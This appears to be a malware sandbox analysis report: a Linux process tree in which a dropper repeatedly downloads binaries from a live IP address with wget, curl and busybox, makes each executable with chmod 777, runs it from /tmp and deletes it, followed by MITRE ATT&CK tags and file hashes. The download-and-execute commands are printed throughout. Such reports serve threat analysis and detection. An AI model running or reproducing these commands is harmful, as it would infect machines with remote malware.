-
/usr/bin/curlcurl -O http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:879
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵PID:880
-
-
/bin/chmodchmod 777 U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT./U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵
- Executes dropped EXE
PID:882
-
-
/bin/rmrm U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵PID:883
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵PID:884
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵PID:886
-
-
/bin/chmodchmod 777 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR./7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵PID:889
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵PID:890
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:891
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵PID:892
-
-
/bin/chmodchmod 777 YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵
- File and Directory Permissions Modification
PID:893
-
-
/tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t./YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵
- Executes dropped EXE
PID:894
-
-
/bin/rmrm YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵PID:895
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- System Network Configuration Discovery
PID:896
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:897
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- System Network Configuration Discovery
PID:898
-
-
/bin/chmodchmod 777 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG./6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:900
-
-
/bin/rmrm 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- System Network Configuration Discovery
PID:901
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵PID:902
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:903
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵PID:904
-
-
/bin/chmodchmod 777 nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵
- File and Directory Permissions Modification
PID:905
-
-
/tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK./nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵
- Executes dropped EXE
PID:906
-
-
/bin/rmrm nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵PID:907
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵PID:908
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:909
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵PID:910
-
-
/bin/chmodchmod 777 I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt./I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵
- Executes dropped EXE
PID:914
-
-
/bin/rmrm I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵PID:915
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵PID:916
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97